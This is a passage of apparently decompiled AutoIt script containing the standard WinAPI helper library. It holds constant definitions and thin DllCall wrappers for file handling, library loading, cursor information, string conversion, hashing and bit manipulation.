  1154. Global Const $mouse_click_main = "main"
  1155. Global Const $mouse_click_menu = "menu"
  1156. Global Const $mouse_click_primary = "primary"
  1157. Global Const $mouse_click_secondary = "secondary"
  1158. Global Const $mouse_wheel_up = "up"
  1159. Global Const $mouse_wheel_down = "down"
  1160. Global Const $number_auto = 0
  1161. Global Const $number_32bit = 1
  1162. Global Const $number_64bit = 2
  1163. Global Const $number_double = 3
  1164. Global Const $obj_name = 1
  1165. Global Const $obj_string = 2
  1166. Global Const $obj_progid = 3
  1167. Global Const $obj_file = 4
  1168. Global Const $obj_module = 5
  1169. Global Const $obj_clsid = 6
  1170. Global Const $obj_iid = 7
  1171. Global Const $exitclose_normal = 0
  1172. Global Const $exitclose_byexit = 1
  1173. Global Const $exitclose_byclick = 2
  1174. Global Const $exitclose_bylogoff = 3
  1175. Global Const $exitclose_byshutdown = 4
  1176. Global Const $process_stats_memory = 0
  1177. Global Const $process_stats_io = 1
  1178. Global Const $process_low = 0
  1179. Global Const $process_belownormal = 1
  1180. Global Const $process_normal = 2
  1181. Global Const $process_abovenormal = 3
  1182. Global Const $process_high = 4
  1183. Global Const $process_realtime = 5
  1184. Global Const $run_logon_noprofile = 0
  1185. Global Const $run_logon_profile = 1
  1186. Global Const $run_logon_network = 2
  1187. Global Const $run_logon_inherit = 4
  1188. Global Const $sound_nowait = 0
  1189. Global Const $sound_wait = 1
  1190. Global Const $shex_open = "open"
  1191. Global Const $shex_edit = "edit"
  1192. Global Const $shex_print = "print"
  1193. Global Const $shex_properties = "properties"
  1194. Global Const $tcp_data_default = 0
  1195. Global Const $tcp_data_binary = 1
  1196. Global Const $udp_open_default = 0
  1197. Global Const $udp_open_broadcast = 1
  1198. Global Const $udp_data_default = 0
  1199. Global Const $udp_data_binary = 1
  1200. Global Const $udp_data_array = 2
  1201. Global Const $tip_noicon = 0
  1202. Global Const $tip_infoicon = 1
  1203. Global Const $tip_warningicon = 2
  1204. Global Const $tip_erroricon = 3
  1205. Global Const $tip_balloon = 1
  1206. Global Const $tip_center = 2
  1207. Global Const $tip_forcevisible = 4
  1208. Global Const $windows_noontop = 0
  1209. Global Const $windows_ontop = 1
  1210. Global Const $win_state_exists = 1
  1211. Global Const $win_state_visible = 2
  1212. Global Const $win_state_enabled = 4
  1213. Global Const $win_state_active = 8
  1214. Global Const $win_state_minimized = 16
  1215. Global Const $win_state_maximized = 32
  1216. Global Const $fc_nooverwrite = 0
  1217. Global Const $fc_overwrite = 1
  1218. Global Const $fc_createpath = 8
  1219. Global Const $ft_modified = 0
  1220. Global Const $ft_created = 1
  1221. Global Const $ft_accessed = 2
  1222. Global Const $ft_array = 0
  1223. Global Const $ft_string = 1
  1224. Global Const $fsf_createbutton = 1
  1225. Global Const $fsf_newdialog = 2
  1226. Global Const $fsf_editcontrol = 4
  1227. Global Const $ft_nonrecursive = 0
  1228. Global Const $ft_recursive = 1
  1229. Global Const $fo_read = 0
  1230. Global Const $fo_append = 1
  1231. Global Const $fo_overwrite = 2
  1232. Global Const $fo_createpath = 8
  1233. Global Const $fo_binary = 16
  1234. Global Const $fo_unicode = 32
  1235. Global Const $fo_utf16_le = 32
  1236. Global Const $fo_utf16_be = 64
  1237. Global Const $fo_utf8 = 128
  1238. Global Const $fo_utf8_nobom = 256
  1239. Global Const $fo_ansi = 512
  1240. Global Const $fo_utf16_le_nobom = 1024
  1241. Global Const $fo_utf16_be_nobom = 2048
  1242. Global Const $fo_utf8_full = 16384
  1243. Global Const $fo_fullfile_detect = 16384
  1244. Global Const $eof = -1
  1245. Global Const $fd_filemustexist = 1
  1246. Global Const $fd_pathmustexist = 2
  1247. Global Const $fd_multiselect = 4
  1248. Global Const $fd_promptcreatenew = 8
  1249. Global Const $fd_promptoverwrite = 16
  1250. Global Const $create_new = 1
  1251. Global Const $create_always = 2
  1252. Global Const $open_existing = 3
  1253. Global Const $open_always = 4
  1254. Global Const $truncate_existing = 5
  1255. Global Const $invalid_set_file_pointer = -1
  1256. Global Const $file_begin = 0
  1257. Global Const $file_current = 1
  1258. Global Const $file_end = 2
  1259. Global Const $file_attribute_readonly = 1
  1260. Global Const $file_attribute_hidden = 2
  1261. Global Const $file_attribute_system = 4
  1262. Global Const $file_attribute_directory = 16
  1263. Global Const $file_attribute_archive = 32
  1264. Global Const $file_attribute_device = 64
  1265. Global Const $file_attribute_normal = 128
  1266. Global Const $file_attribute_temporary = 256
  1267. Global Const $file_attribute_sparse_file = 512
  1268. Global Const $file_attribute_reparse_point = 1024
  1269. Global Const $file_attribute_compressed = 2048
  1270. Global Const $file_attribute_offline = 4096
  1271. Global Const $file_attribute_not_content_indexed = 8192
  1272. Global Const $file_attribute_encrypted = 16384
  1273. Global Const $file_share_read = 1
  1274. Global Const $file_share_write = 2
  1275. Global Const $file_share_delete = 4
  1276. Global Const $file_share_readwrite = BitOR($file_share_read, $file_share_write)
  1277. Global Const $file_share_any = BitOR($file_share_read, $file_share_write, $file_share_delete)
  1278. Global Const $generic_all = 268435456
  1279. Global Const $generic_execute = 536870912
  1280. Global Const $generic_write = 1073741824
  1281. Global Const $generic_read = -2147483648
  1282. Global Const $generic_readwrite = BitOR($generic_read, $generic_write)
  1283. Global Const $file_encoding_utf16le = 32
  1284. Global Const $fe_entire_utf8 = 1
  1285. Global Const $fe_partialfirst_utf8 = 2
  1286. Global Const $fn_fullpath = 0
  1287. Global Const $fn_relativepath = 1
  1288. Global Const $fv_comments = "Comments"
  1289. Global Const $fv_companyname = "CompanyName"
  1290. Global Const $fv_filedescription = "FileDescription"
  1291. Global Const $fv_fileversion = "FileVersion"
  1292. Global Const $fv_internalname = "InternalName"
  1293. Global Const $fv_legalcopyright = "LegalCopyright"
  1294. Global Const $fv_legaltrademarks = "LegalTrademarks"
  1295. Global Const $fv_originalfilename = "OriginalFilename"
  1296. Global Const $fv_productname = "ProductName"
  1297. Global Const $fv_productversion = "ProductVersion"
  1298. Global Const $fv_privatebuild = "PrivateBuild"
  1299. Global Const $fv_specialbuild = "SpecialBuild"
  1300. Global Const $frta_nocount = 0
  1301. Global Const $frta_count = 1
  1302. Global Const $frta_intarrays = 2
  1303. Global Const $frta_entiresplit = 4
  1304. Global Const $flta_filesfolders = 0
  1305. Global Const $flta_files = 1
  1306. Global Const $flta_folders = 2
  1307. Global Const $fltar_filesfolders = 0
  1308. Global Const $fltar_files = 1
  1309. Global Const $fltar_folders = 2
  1310. Global Const $fltar_nohidden = 4
  1311. Global Const $fltar_nosystem = 8
  1312. Global Const $fltar_nolink = 16
  1313. Global Const $fltar_norecur = 0
  1314. Global Const $fltar_recur = 1
  1315. Global Const $fltar_nosort = 0
  1316. Global Const $fltar_sort = 1
  1317. Global Const $fltar_fastsort = 2
  1318. Global Const $fltar_nopath = 0
  1319. Global Const $fltar_relpath = 1
  1320. Global Const $fltar_fullpath = 2
  1321. Global Const $path_original = 0
  1322. Global Const $path_drive = 1
  1323. Global Const $path_directory = 2
  1324. Global Const $path_filename = 3
  1325. Global Const $path_extension = 4
  1326. Global Const $mb_ok = 0
  1327. Global Const $mb_okcancel = 1
  1328. Global Const $mb_abortretryignore = 2
  1329. Global Const $mb_yesnocancel = 3
  1330. Global Const $mb_yesno = 4
  1331. Global Const $mb_retrycancel = 5
  1332. Global Const $mb_canceltrycontinue = 6
  1333. Global Const $mb_help = 16384
  1334. Global Const $mb_iconstop = 16
  1335. Global Const $mb_iconerror = 16
  1336. Global Const $mb_iconhand = 16
  1337. Global Const $mb_iconquestion = 32
  1338. Global Const $mb_iconexclamation = 48
  1339. Global Const $mb_iconwarning = 48
  1340. Global Const $mb_iconinformation = 64
  1341. Global Const $mb_iconasterisk = 64
  1342. Global Const $mb_usericon = 128
  1343. Global Const $mb_defbutton1 = 0
  1344. Global Const $mb_defbutton2 = 256
  1345. Global Const $mb_defbutton3 = 512
  1346. Global Const $mb_defbutton4 = 768
  1347. Global Const $mb_applmodal = 0
  1348. Global Const $mb_systemmodal = 4096
  1349. Global Const $mb_taskmodal = 8192
  1350. Global Const $mb_default_desktop_only = 131072
  1351. Global Const $mb_right = 524288
  1352. Global Const $mb_rtlreading = 1048576
  1353. Global Const $mb_setforeground = 65536
  1354. Global Const $mb_topmost = 262144
  1355. Global Const $mb_service_notification = 2097152
  1356. Global Const $mb_rightjustified = $mb_right
  1357. Global Const $idtimeout = -1
  1358. Global Const $idok = 1
  1359. Global Const $idcancel = 2
  1360. Global Const $idabort = 3
  1361. Global Const $idretry = 4
  1362. Global Const $idignore = 5
  1363. Global Const $idyes = 6
  1364. Global Const $idno = 7
  1365. Global Const $idclose = 8
  1366. Global Const $idhelp = 9
  1367. Global Const $idtryagain = 10
  1368. Global Const $idcontinue = 11
  1369. #Region Global Variables and Constants
  1370. Global $__g_venum, $__g_vext = 0
  1371. Global $__g_irgbmode = 1
  1372. Global Const $tagosversioninfo = "struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
  1373. Global Const $image_bitmap = 0
  1374. Global Const $image_icon = 1
  1375. Global Const $image_cursor = 2
  1376. Global Const $image_enhmetafile = 3
  1377. Global Const $lr_defaultcolor = 0
  1378. Global Const $lr_monochrome = 1
  1379. Global Const $lr_color = 2
  1380. Global Const $lr_copyreturnorg = 4
  1381. Global Const $lr_copydeleteorg = 8
  1382. Global Const $lr_loadfromfile = 16
  1383. Global Const $lr_loadtransparent = 32
  1384. Global Const $lr_defaultsize = 64
  1385. Global Const $lr_vgacolor = 128
  1386. Global Const $lr_loadmap3dcolors = 4096
  1387. Global Const $lr_createdibsection = 8192
  1388. Global Const $lr_copyfromresource = 16384
  1389. Global Const $lr_shared = 32768
  1390. Global Const $__tagcursorinfo = "dword Size;dword Flags;handle hCursor;" & "struct;long X;long Y;endstruct"
  1391. Global Const $__winver = __winver()
  1392. #EndRegion Global Variables and Constants
  1393. #Region Functions list
  1394. #EndRegion Functions list
  1395. #Region Public Functions
  1396.  
  1397. Func _winapi_createfile($sfilename, $icreation, $iaccess = 4, $ishare = 0, $iattributes = 0, $tsecurity = 0)
  1398. Local $ida = 0, $ism = 0, $icd = 0, $ifa = 0
  1399. If BitAND($iaccess, 1) <> 0 Then $ida = BitOR($ida, $generic_execute)
  1400. If BitAND($iaccess, 2) <> 0 Then $ida = BitOR($ida, $generic_read)
  1401. If BitAND($iaccess, 4) <> 0 Then $ida = BitOR($ida, $generic_write)
  1402. If BitAND($ishare, 1) <> 0 Then $ism = BitOR($ism, $file_share_delete)
  1403. If BitAND($ishare, 2) <> 0 Then $ism = BitOR($ism, $file_share_read)
  1404. If BitAND($ishare, 4) <> 0 Then $ism = BitOR($ism, $file_share_write)
  1405. Switch $icreation
  1406. Case 0
  1407. $icd = $create_new
  1408. Case 1
  1409. $icd = $create_always
  1410. Case 2
  1411. $icd = $open_existing
  1412. Case 3
  1413. $icd = $open_always
  1414. Case 4
  1415. $icd = $truncate_existing
  1416. EndSwitch
  1417. If BitAND($iattributes, 1) <> 0 Then $ifa = BitOR($ifa, $file_attribute_archive)
  1418. If BitAND($iattributes, 2) <> 0 Then $ifa = BitOR($ifa, $file_attribute_hidden)
  1419. If BitAND($iattributes, 4) <> 0 Then $ifa = BitOR($ifa, $file_attribute_readonly)
  1420. If BitAND($iattributes, 8) <> 0 Then $ifa = BitOR($ifa, $file_attribute_system)
  1421. Local $aresult = DllCall("kernel32.dll", "handle", "CreateFileW", "wstr", $sfilename, "dword", $ida, "dword", $ism, "struct*", $tsecurity, "dword", $icd, "dword", $ifa, "ptr", 0)
  1422. If @error OR ($aresult[0] = Ptr(-1)) Then Return SetError(@error, @extended, 0)
  1423. Return $aresult[0]
  1424. EndFunc
  1425.  
  1426. Func _winapi_freelibrary($hmodule)
  1427. Local $aresult = DllCall("kernel32.dll", "bool", "FreeLibrary", "handle", $hmodule)
  1428. If @error Then Return SetError(@error, @extended, False)
  1429. Return $aresult[0]
  1430. EndFunc
  1431.  
  1432. Func _winapi_getcursorinfo()
  1433. Local $tcursor = DllStructCreate($__tagcursorinfo)
  1434. Local $icursor = DllStructGetSize($tcursor)
  1435. DllStructSetData($tcursor, "Size", $icursor)
  1436. Local $aret = DllCall("user32.dll", "bool", "GetCursorInfo", "struct*", $tcursor)
  1437. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  1438. Local $acursor[5]
  1439. $acursor[0] = True
  1440. $acursor[1] = DllStructGetData($tcursor, "Flags") <> 0
  1441. $acursor[2] = DllStructGetData($tcursor, "hCursor")
  1442. $acursor[3] = DllStructGetData($tcursor, "X")
  1443. $acursor[4] = DllStructGetData($tcursor, "Y")
  1444. Return $acursor
  1445. EndFunc
  1446.  
  1447. Func _winapi_getdlgctrlid($hwnd)
  1448. Local $aresult = DllCall("user32.dll", "int", "GetDlgCtrlID", "hwnd", $hwnd)
  1449. If @error Then Return SetError(@error, @extended, 0)
  1450. Return $aresult[0]
  1451. EndFunc
  1452.  
  1453. Func _winapi_getmodulehandle($smodulename)
  1454. Local $smodulenametype = "wstr"
  1455. If $smodulename = "" Then
  1456. $smodulename = 0
  1457. $smodulenametype = "ptr"
  1458. EndIf
  1459. Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
  1460. If @error Then Return SetError(@error, @extended, 0)
  1461. Return $aresult[0]
  1462. EndFunc
  1463.  
  1464. Func _winapi_getstring($pstring, $bunicode = True)
  1465. Local $ilength = _winapi_strlen($pstring, $bunicode)
  1466. If @error OR NOT $ilength Then Return SetError(@error + 10, @extended, "")
  1467. Local $tstring = DllStructCreate(($bunicode ? "wchar" : "char") & "[" & ($ilength + 1) & "]", $pstring)
  1468. If @error Then Return SetError(@error, @extended, "")
  1469. Return SetExtended($ilength, DllStructGetData($tstring, 1))
  1470. EndFunc
  1471.  
  1472. Func _winapi_iswow64process($ipid = 0)
  1473. If NOT $ipid Then $ipid = @AutoItPID
  1474. Local $hprocess = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", ($__winver < 1536 ? 1024 : 4096), "bool", 0, "dword", $ipid)
  1475. If @error OR NOT $hprocess[0] Then Return SetError(@error + 20, @extended, False)
  1476. Local $aret = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $hprocess[0], "bool*", 0)
  1477. If __checkerrorclosehandle($aret, $hprocess[0]) Then Return SetError(@error, @extended, False)
  1478. Return $aret[2]
  1479. EndFunc
  1480.  
  1481. Func _winapi_loadimage($hinstance, $simage, $itype, $ixdesired, $iydesired, $iload)
  1482. Local $aresult, $simagetype = "int"
  1483. If IsString($simage) Then $simagetype = "wstr"
  1484. $aresult = DllCall("user32.dll", "handle", "LoadImageW", "handle", $hinstance, $simagetype, $simage, "uint", $itype, "int", $ixdesired, "int", $iydesired, "uint", $iload)
  1485. If @error Then Return SetError(@error, @extended, 0)
  1486. Return $aresult[0]
  1487. EndFunc
  1488.  
  1489. Func _winapi_loadlibrary($sfilename)
  1490. Local $aresult = DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", $sfilename)
  1491. If @error Then Return SetError(@error, @extended, 0)
  1492. Return $aresult[0]
  1493. EndFunc
  1494.  
  1495. Func _winapi_pathisdirectory($sfilepath)
  1496. Local $aret = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", $sfilepath)
  1497. If @error Then Return SetError(@error, @extended, False)
  1498. Return $aret[0]
  1499. EndFunc
  1500.  
  1501. Func _winapi_readfile($hfile, $pbuffer, $itoread, ByRef $iread, $toverlapped = 0)
  1502. Local $aresult = DllCall("kernel32.dll", "bool", "ReadFile", "handle", $hfile, "struct*", $pbuffer, "dword", $itoread, "dword*", 0, "struct*", $toverlapped)
  1503. If @error Then Return SetError(@error, @extended, False)
  1504. $iread = $aresult[4]
  1505. Return $aresult[0]
  1506. EndFunc
  1507.  
  1508. Func _winapi_strlen($pstring, $bunicode = True)
  1509. Local $w = ""
  1510. If $bunicode Then $w = "W"
  1511. Local $aret = DllCall("kernel32.dll", "int", "lstrlen" & $w, "struct*", $pstring)
  1512. If @error Then Return SetError(@error, @extended, 0)
  1513. Return $aret[0]
  1514. EndFunc
  1515.  
  1516. Func _winapi_switchcolor($icolor)
  1517. If $icolor = -1 Then Return $icolor
  1518. Return BitOR(BitAND($icolor, 65280), BitShift(BitAND($icolor, 255), -16), BitShift(BitAND($icolor, 16711680), 16))
  1519. EndFunc
  1520.  
  1521. Func _winapi_writefile($hfile, $pbuffer, $itowrite, ByRef $iwritten, $toverlapped = 0)
  1522. Local $aresult = DllCall("kernel32.dll", "bool", "WriteFile", "handle", $hfile, "struct*", $pbuffer, "dword", $itowrite, "dword*", 0, "struct*", $toverlapped)
  1523. If @error Then Return SetError(@error, @extended, False)
  1524. $iwritten = $aresult[4]
  1525. Return $aresult[0]
  1526. EndFunc
  1527.  
  1528. #EndRegion Public Functions
  1529. #Region Internal Functions
  1530.  
  1531. Func __checkerrorarraybounds(Const ByRef $adata, ByRef $istart, ByRef $iend, $ndim = 1, $idim = $ubound_dimensions)
  1532. If NOT IsArray($adata) Then Return SetError(1, 0, 1)
  1533. If UBound($adata, $idim) <> $ndim Then Return SetError(2, 0, 1)
  1534. If $istart < 0 Then $istart = 0
  1535. Local $iubound = UBound($adata) - 1
  1536. If $iend < 1 OR $iend > $iubound Then $iend = $iubound
  1537. If $istart > $iend Then Return SetError(4, 0, 1)
  1538. Return 0
  1539. EndFunc
  1540.  
  1541. Func __checkerrorclosehandle($aret, $hfile, $blasterror = False, $icurerr = @error, $icurext = @extended)
  1542. If NOT $icurerr AND NOT $aret[0] Then $icurerr = 10
  1543. Local $alasterror = DllCall("kernel32.dll", "dword", "GetLastError")
  1544. DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hfile)
  1545. If $icurerr Then DllCall("kernel32.dll", "none", "SetLastError", "dword", $alasterror[0])
  1546. If $blasterror Then $icurext = $alasterror[0]
  1547. Return SetError($icurerr, $icurext, $icurerr)
  1548. EndFunc
  1549.  
  1550. Func __dll($spath, $bpin = False)
  1551. Local $aret = DllCall("kernel32.dll", "bool", "GetModuleHandleExW", "dword", ($bpin ? 1 : 2), "wstr", $spath, "ptr*", 0)
  1552. If NOT $aret[3] Then
  1553. Local $aresult = DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", $spath)
  1554. If NOT $aresult[0] Then Return 0
  1555. EndIf
  1556. Return 1
  1557. EndFunc
  1558.  
  1559. Func __enumwindowsproc($hwnd, $bvisible)
  1560. Local $aresult
  1561. If $bvisible Then
  1562. $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
  1563. If NOT $aresult[0] Then
  1564. Return 1
  1565. EndIf
  1566. EndIf
  1567. __inc($__g_venum)
  1568. $__g_venum[$__g_venum[0][0]][0] = $hwnd
  1569. $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
  1570. $__g_venum[$__g_venum[0][0]][1] = $aresult[2]
  1571. Return 1
  1572. EndFunc
  1573.  
  1574. Func __fatalexit($icode, $stext = "")
  1575. If $stext Then MsgBox($mb_systemmodal, "AutoIt", $stext)
  1576. DllCall("kernel32.dll", "none", "FatalExit", "int", $icode)
  1577. EndFunc
  1578.  
  1579. Func __inc(ByRef $adata, $iincrement = 100)
  1580. Select
  1581. Case UBound($adata, $ubound_columns)
  1582. If $iincrement < 0 Then
  1583. ReDim $adata[$adata[0][0] + 1][UBound($adata, $ubound_columns)]
  1584. Else
  1585. $adata[0][0] += 1
  1586. If $adata[0][0] > UBound($adata) - 1 Then
  1587. ReDim $adata[$adata[0][0] + $iincrement][UBound($adata, $ubound_columns)]
  1588. EndIf
  1589. EndIf
  1590. Case UBound($adata, $ubound_rows)
  1591. If $iincrement < 0 Then
  1592. ReDim $adata[$adata[0] + 1]
  1593. Else
  1594. $adata[0] += 1
  1595. If $adata[0] > UBound($adata) - 1 Then
  1596. ReDim $adata[$adata[0] + $iincrement]
  1597. EndIf
  1598. EndIf
  1599. Case Else
  1600. Return 0
  1601. EndSelect
  1602. Return 1
  1603. EndFunc
  1604.  
  1605. Func __rgb($icolor)
  1606. If $__g_irgbmode Then
  1607. $icolor = _winapi_switchcolor($icolor)
  1608. EndIf
  1609. Return $icolor
  1610. EndFunc
  1611.  
  1612. Func __winver()
  1613. Local $tosvi = DllStructCreate($tagosversioninfo)
  1614. DllStructSetData($tosvi, 1, DllStructGetSize($tosvi))
  1615. Local $aret = DllCall("kernel32.dll", "bool", "GetVersionExW", "struct*", $tosvi)
  1616. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, 0)
  1617. Return BitOR(BitShift(DllStructGetData($tosvi, 2), -8), DllStructGetData($tosvi, 3))
  1618. EndFunc
  1619.  
  1620. #EndRegion Internal Functions
  1621. #Region Global Variables and Constants
  1622. #EndRegion Global Variables and Constants
  1623. #Region Functions list
  1624. #EndRegion Functions list
  1625. #Region Public Functions
  1626.  
  1627. Func _winapi_chartooem($sstr)
  1628. Local $aret = DllCall("user32.dll", "bool", "CharToOemW", "wstr", $sstr, "wstr", "")
  1629. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, "")
  1630. Return $aret[2]
  1631. EndFunc
  1632.  
  1633. Func _winapi_clienttoscreen($hwnd, ByRef $tpoint)
  1634. Local $aret = DllCall("user32.dll", "bool", "ClientToScreen", "hwnd", $hwnd, "struct*", $tpoint)
  1635. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  1636. Return $tpoint
  1637. EndFunc
  1638.  
  1639. Func _winapi_dwordtofloat($ivalue)
  1640. Local $tdword = DllStructCreate("dword")
  1641. Local $tfloat = DllStructCreate("float", DllStructGetPtr($tdword))
  1642. DllStructSetData($tdword, 1, $ivalue)
  1643. Return DllStructGetData($tfloat, 1)
  1644. EndFunc
  1645.  
  1646. Func _winapi_dwordtoint($ivalue)
  1647. Local $tdata = DllStructCreate("int")
  1648. DllStructSetData($tdata, 1, $ivalue)
  1649. Return DllStructGetData($tdata, 1)
  1650. EndFunc
  1651.  
  1652. Func _winapi_floattodword($ivalue)
  1653. Local $tfloat = DllStructCreate("float")
  1654. Local $tdword = DllStructCreate("dword", DllStructGetPtr($tfloat))
  1655. DllStructSetData($tfloat, 1, $ivalue)
  1656. Return DllStructGetData($tdword, 1)
  1657. EndFunc
  1658.  
  1659. Func _winapi_floattoint($nfloat)
  1660. Local $tfloat = DllStructCreate("float")
  1661. Local $tint = DllStructCreate("int", DllStructGetPtr($tfloat))
  1662. DllStructSetData($tfloat, 1, $nfloat)
  1663. Return DllStructGetData($tint, 1)
  1664. EndFunc
  1665.  
  1666. Func _winapi_getxyfrompoint(ByRef $tpoint, ByRef $ix, ByRef $iy)
  1667. $ix = DllStructGetData($tpoint, "X")
  1668. $iy = DllStructGetData($tpoint, "Y")
  1669. EndFunc
  1670.  
  1671. Func _winapi_guidfromstring($sguid)
  1672. Local $tguid = DllStructCreate($tagguid)
  1673. _winapi_guidfromstringex($sguid, $tguid)
  1674. If @error Then Return SetError(@error + 10, @extended, 0)
  1675. Return $tguid
  1676. EndFunc
  1677.  
  1678. Func _winapi_guidfromstringex($sguid, $tguid)
  1679. Local $aresult = DllCall("ole32.dll", "long", "CLSIDFromString", "wstr", $sguid, "struct*", $tguid)
  1680. If @error Then Return SetError(@error, @extended, False)
  1681. Return $aresult[0]
  1682. EndFunc
  1683.  
  1684. Func _winapi_hashdata($pmemory, $isize, $ilength = 32)
  1685. If ($ilength <= 0) OR ($ilength > 256) Then Return SetError(11, 0, 0)
  1686. Local $tdata = DllStructCreate("byte[" & $ilength & "]")
  1687. Local $aret = DllCall("shlwapi.dll", "uint", "HashData", "struct*", $pmemory, "dword", $isize, "struct*", $tdata, "dword", $ilength)
  1688. If @error Then Return SetError(@error, @extended, 0)
  1689. If $aret[0] Then Return SetError(10, $aret[0], 0)
  1690. Return DllStructGetData($tdata, 1)
  1691. EndFunc
  1692.  
  1693. Func _winapi_hashstring($sstring, $bcasesensitive = True, $ilength = 32)
  1694. Local $ilengths = StringLen($sstring)
  1695. If NOT $ilengths OR ($ilength > 256) Then Return SetError(12, 0, 0)
  1696. Local $tstring = DllStructCreate("wchar[" & ($ilengths + 1) & "]")
  1697. If NOT $bcasesensitive Then
  1698. $sstring = StringLower($sstring)
  1699. EndIf
  1700. DllStructSetData($tstring, 1, $sstring)
  1701. Local $shash = _winapi_hashdata($tstring, 2 * $ilengths, $ilength)
  1702. If @error Then Return SetError(@error, @extended, 0)
  1703. Return $shash
  1704. EndFunc
  1705.  
  1706. Func _winapi_hibyte($ivalue)
  1707. Return BitAND(BitShift($ivalue, 8), 255)
  1708. EndFunc
  1709.  
  1710. Func _winapi_hidword($ivalue)
  1711. Local $tint64 = DllStructCreate("int64")
  1712. Local $tqword = DllStructCreate("dword;dword", DllStructGetPtr($tint64))
  1713. DllStructSetData($tint64, 1, $ivalue)
  1714. Return DllStructGetData($tqword, 2)
  1715. EndFunc
  1716.  
  1717. Func _winapi_hiword($ilong)
  1718. Return BitShift($ilong, 16)
  1719. EndFunc
  1720.  
  1721. Func _winapi_inttodword($ivalue)
  1722. Local $tdata = DllStructCreate("dword")
  1723. DllStructSetData($tdata, 1, $ivalue)
  1724. Return DllStructGetData($tdata, 1)
  1725. EndFunc
  1726.  
  1727. Func _winapi_inttofloat($iint)
  1728. Local $tint = DllStructCreate("int")
  1729. Local $tfloat = DllStructCreate("float", DllStructGetPtr($tint))
  1730. DllStructSetData($tint, 1, $iint)
  1731. Return DllStructGetData($tfloat, 1)
  1732. EndFunc
  1733.  
  1734. Func _winapi_lobyte($ivalue)
  1735. Return BitAND($ivalue, 255)
  1736. EndFunc
  1737.  
  1738. Func _winapi_lodword($ivalue)
  1739. Local $tint64 = DllStructCreate("int64")
  1740. Local $tqword = DllStructCreate("dword;dword", DllStructGetPtr($tint64))
  1741. DllStructSetData($tint64, 1, $ivalue)
  1742. Return DllStructGetData($tqword, 1)
  1743. EndFunc
  1744.  
  1745. Func _winapi_loword($ilong)
  1746. Return BitAND($ilong, 65535)
  1747. EndFunc
  1748.  
  1749. Func _winapi_longmid($ivalue, $istart, $icount)
  1750. Return BitAND(BitShift($ivalue, $istart), BitOR(BitShift(BitShift(2147483647, 32 - ($icount + 1)), 1), BitShift(1, -($icount - 1))))
  1751. EndFunc
  1752.  
  1753. Func _winapi_makelangid($ilngidprimary, $ilngidsub)
  1754. Return BitOR(BitShift($ilngidsub, -10), $ilngidprimary)
  1755. EndFunc
  1756.  
  1757. Func _winapi_makelcid($ilngid, $isortid)
  1758. Return BitOR(BitShift($isortid, -16), $ilngid)
  1759. EndFunc
  1760.  
  1761. Func _winapi_makelong($ilo, $ihi)
  1762. Return BitOR(BitShift($ihi, -16), BitAND($ilo, 65535))
  1763. EndFunc
  1764.  
  1765. Func _winapi_makeqword($ilodword, $ihidword)
  1766. Local $tint64 = DllStructCreate("uint64")
  1767. Local $tdwords = DllStructCreate("dword;dword", DllStructGetPtr($tint64))
  1768. DllStructSetData($tdwords, 1, $ilodword)
  1769. DllStructSetData($tdwords, 2, $ihidword)
  1770. Return DllStructGetData($tint64, 1)
  1771. EndFunc
  1772.  
  1773. Func _winapi_makeword($ilo, $ihi)
  1774. Local $tword = DllStructCreate("ushort")
  1775. Local $tbyte = DllStructCreate("byte;byte", DllStructGetPtr($tword))
  1776. DllStructSetData($tbyte, 1, $ihi)
  1777. DllStructSetData($tbyte, 2, $ilo)
  1778. Return DllStructGetData($tword, 1)
  1779. EndFunc
  1780.  
  1781. Func _winapi_multibytetowidechar($vtext, $icodepage = 0, $iflags = 0, $bretstring = False)
  1782. Local $stexttype = "str"
  1783. If NOT IsString($vtext) Then $stexttype = "struct*"
  1784. Local $aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, $stexttype, $vtext, "int", -1, "ptr", 0, "int", 0)
  1785. If @error OR NOT $aresult[0] Then Return SetError(@error + 10, @extended, 0)
  1786. Local $iout = $aresult[0]
  1787. Local $tout = DllStructCreate("wchar[" & $iout & "]")
  1788. $aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, $stexttype, $vtext, "int", -1, "struct*", $tout, "int", $iout)
  1789. If @error OR NOT $aresult[0] Then Return SetError(@error + 20, @extended, 0)
  1790. If $bretstring Then Return DllStructGetData($tout, 1)
  1791. Return $tout
  1792. EndFunc
  1793.  
  1794. Func _winapi_multibytetowidecharex($stext, $ptext, $icodepage = 0, $iflags = 0)
  1795. Local $aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, "STR", $stext, "int", -1, "struct*", $ptext, "int", (StringLen($stext) + 1) * 2)
  1796. If @error Then Return SetError(@error, @extended, False)
  1797. Return $aresult[0]
  1798. EndFunc
  1799.  
  1800. Func _winapi_oemtochar($sstr)
  1801. Local $aret = DllCall("user32.dll", "bool", "OemToChar", "str", $sstr, "str", "")
  1802. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, "")
  1803. Return $aret[2]
  1804. EndFunc
  1805.  
  1806. Func _winapi_pointfromrect(ByRef $trect, $bcenter = True)
  1807. Local $ix1 = DllStructGetData($trect, "Left")
  1808. Local $iy1 = DllStructGetData($trect, "Top")
  1809. Local $ix2 = DllStructGetData($trect, "Right")
  1810. Local $iy2 = DllStructGetData($trect, "Bottom")
  1811. If $bcenter Then
  1812. $ix1 = $ix1 + (($ix2 - $ix1) / 2)
  1813. $iy1 = $iy1 + (($iy2 - $iy1) / 2)
  1814. EndIf
  1815. Local $tpoint = DllStructCreate($tagpoint)
  1816. DllStructSetData($tpoint, "X", $ix1)
